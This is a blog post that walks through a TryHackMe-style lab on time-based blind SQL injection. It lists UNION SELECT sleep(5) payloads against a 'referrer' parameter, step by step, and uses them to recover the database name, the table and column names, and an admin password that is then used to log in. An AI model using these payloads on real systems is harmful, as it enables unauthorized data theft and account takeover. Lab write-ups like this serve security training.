Uncategorized

Time-based Blind SQL Injection

admin

Similar to the aforementioned Boolean-based blind SQL Injection in that the same requests are sent, but this time there is no visual cue as to whether your queries are correct or incorrect. Instead, you should base your assessment of a correct query on how long it takes to complete. By combining the UNION statement with built-in methods like SLEEP(x), this time delay is created. Only after a successful UNION SELECT statement will the SLEEP() method ever be called.

To illustrate the Time Based Blind SQL Injection, let’s use a sample Web application. A screenshot of that application is provided below.

In the screenshot above, you can see that there are two pages—the one above is susceptible to time-based SQL injection, and the one below is the login page to which we have to login after we exploited the one above through time-based SQL injection.

So let’s start

Thus, boolean-based and blind-based SQL injection are very similar; the only difference is in the response. As a result, while boolean-based sql injection gives us results in the form of true or false, 1/0, or other similar outcomes, time-based sql injection instead produces results in the form of time delays, such as

For instance, we have created a payload that, if the table named “users” exists, creates a delay of five seconds. If it does not create a delay of five seconds, the table named “users” does not exist.

So lets start exploiting it

Here, in the screen shot up top, I highlighted the vulnerable page. Consequently, the vulnerable url is 

https://website.thm/analytics?referrer=tryhackme.com

Referrer parameter is thus at risk here. The query that is executed at the backend as a result of all of our payloading is below.

select * from analytics_referrers where domain=’tryhackme.com’ LIMIT 1

So now we have exploit it

Step_1(Enumerate the Database type)

Lets make a payload

tryhackme.com’ UNION SELECT sleep(5),NULL where database() like ‘s%’–

We are checking that the name of the payload is already in use in the above payload, so it checks the first letter of the database name and sleeps for 5 seconds if it matches; otherwise, it responds right away.

Find the length of the database name before executing the payloads below.

So the payload for that is 

tryhackme.com’ UNION SELECT sleep(5),NULL where length(database())=9– –

The screenshot below shows that it waits for 5 seconds, making the database name length 9

So lets execute payloads by changing the first characters one by one as below

  1. tryhackme.com’ UNION SELECT sleep(5),NULL where database() like ‘a%’–
  2. tryhackme.com’ UNION SELECT sleep(5),NULL where database() like ‘b%’– 
  3. tryhackme.com’ UNION SELECT sleep(5),NULL where database() like ‘c%’–
  4. tryhackme.com’ UNION SELECT sleep(5),NULL where database() like ‘d%’–
  5. tryhackme.com’ UNION SELECT sleep(5),NULL where database() like ‘e%’–

So executing above payload until page sleep for the 5 seconds 

As a result, we know that the first letter of the phrase is “s” when we execute the payload below.

tryhackme.com’ UNION SELECT sleep(5),NULL where database() like ‘s%’–

So to find the second letter payload is below

tryhackme.com’ UNION SELECT sleep(5),NULL where database() like ‘sa%’– 

So to find the second letter we replace all the characters and one of them makes us wait for 5 seconds and it is 

tryhackme.com’ UNION SELECT sleep(5),NULL where database() like ‘sq%’– 

So, in order to get the full name, we try to use brute force on every characters 

Consequently, the full name’s final payload is 

tryhackme.com’ UNION SELECT sleep(5),NULL where database() like ‘sqli_four%’– 

Now that we are aware of the database name that is currently in use, the next step is to identify the table name that contains the username.

step_2(Enumerate Name of the tablename)

We will now identify the name of the table that contains user credentials in this step.

Before making the payload lets explain something

A table called Information_schema.tables has columns like table_name and table_schema that contain metadata about all of the tables. 

SO lets make payloads

tryhackme.com’ UNION SELECT sleep(5),NULL FROM information_schema.tables where table_schema=’sqli_four’ and table_name LIKE ‘u%’– –

Screenshot of the output of above payload

Therefore, the above payload will only run for 5 seconds if a row with the values “sqli_four” in the table_schema column and “u” in the table_name column exists.

Next, locate the characters in the table that begin with the letter “u”

In that case, let’s create the payload.

tryhackme.com’ UNION SELECT sleep(5),NULL FROM information_schema.tables where table_schema=’sqli_four’ and table_name LIKE ‘ua%’– –

Now trying payloads one by one to find second characters

  1. tryhackme.com’ UNION SELECT sleep(5),NULL FROM information_schema.tables where table_schema=’sqli_four’ and table_name LIKE ‘ua%’– –
  2. tryhackme.com’ UNION SELECT sleep(5),NULL FROM information_schema.tables where table_schema=’sqli_four’ and table_name LIKE ‘ub%’– –
  3. tryhackme.com’ UNION SELECT sleep(5),NULL FROM information_schema.tables where table_schema=’sqli_four’ and table_name LIKE ‘uc%’– –
  4. tryhackme.com’ UNION SELECT sleep(5),NULL FROM information_schema.tables where table_schema=’sqli_four’ and table_name LIKE ‘ud%’– –

Now trying below payload

tryhackme.com’ UNION SELECT sleep(5),NULL FROM information_schema.tables where table_schema=’sqli_four’ and table_name LIKE ‘us%’– –

So executed the below above and it is giving us us output after 5 minutes

So second character is ‘s’

So final payload that we will execute is below

tryhackme.com’ UNION SELECT sleep(5),NULL FROM information_schema.tables where table_schema=’sqli_four’ and table_name LIKE ‘users%’– –

So table name is users

step_3(Enumerate column Names)

The tables called users’ column names are now being listed.

Before determining the names of the columns, let’s use a table called information_schema.columns that contains metadata about all the columns in all the tables.

LEts make the payload, 

tryhackme.com’ UNION SELECT sleep(5),NULL FROM information_schema.columns where table_schema=’sqli_four’ and table_name=’users’  AND column_name LIKE ‘u%’– –

Because it slept for 5 seconds, the column name that starts with “u” and is present in the screenshot above was found.

Now in this searching for the second characters and payload for that is 

tryhackme.com’ UNION SELECT sleep(5),NULL FROM information_schema.columns where table_schema=’sqli_four’ and table_name=’users’  AND column_name LIKE ‘us%’– –

Now to find second characters lets try each and every characters by putting it in the second place 

After execuring the above payload it waits for the five seconds so we got the first two characters and  the second characters is ‘s’

We therefore count all the characters in this manner, and the final payload would be

tryhackme.com’ UNION SELECT sleep(5),NULL FROM information_schema.columns where table_schema=’sqli_four’ and table_name=’users’  AND column_name LIKE ‘username%’– –

SO now we found out the one column is ‘username’

So now in this way we will find other column names and those are id and password

So the Final payload for the password column would be

tryhackme.com’ UNION SELECT sleep(5),NULL FROM information_schema.columns where table_schema=’sqli_four’ and table_name=’users’  AND column_name LIKE ‘password%’– –

Below is the screenshot of the above payload

We now have the username and password columns of the users table, which are useful.

step_4(enumerate username and password)

Therefore, we list each username first, followed by its password.

So let’s look up the user name “admin.”

We must first determine whether the username “admin” actually exists.

Lets make payload for that

tryhackme.com’ UNION SELECT sleep(5),NULL FROM users where username LIKE ‘admin%’– –

We are aware that the application requires us to wait for 5 seconds before we can confirm that the admin user is present in the database.

Screenshot of the above payload

now enumerate the password for ‘admin’ username

Make a note that password contain anything so we have to try each and every characters.

So first we have to find the length of the password 

So lets make payload for that

tryhackme.com’ UNION SELECT sleep(5),NULL FROM users where username=’admin’ and length(password)=4– –

So above payload executed and makes us wait for 5 seconds so length of the password is four.

Screenshot of the above payload is below

Lets make the payload for that 

tryhackme.com’ UNION SELECT sleep(5),NULL FROM users where username=’admin’ and password LIKE ‘4%’– –

Screenshot of the above payload is below

Here i have tried many characters before this but they are not success and i have not shown them because it is similar to the username enumeration.

So the final payload for the password enumeration would be

tryhackme.com’ UNION SELECT sleep(5),NULL FROM users where username=’admin’ and password = ‘4961’– –

So after executing the above payload it makes us wait for the 5 seconds so password for the ‘admin’ user is ‘4961’

Screenshot for the above is 

So if we try to login it logged in us and below is the screenshot for that

So thats all for the TIme based sql injection lab

Thank you

Leave a Reply

Your email address will not be published. Required fields are marked *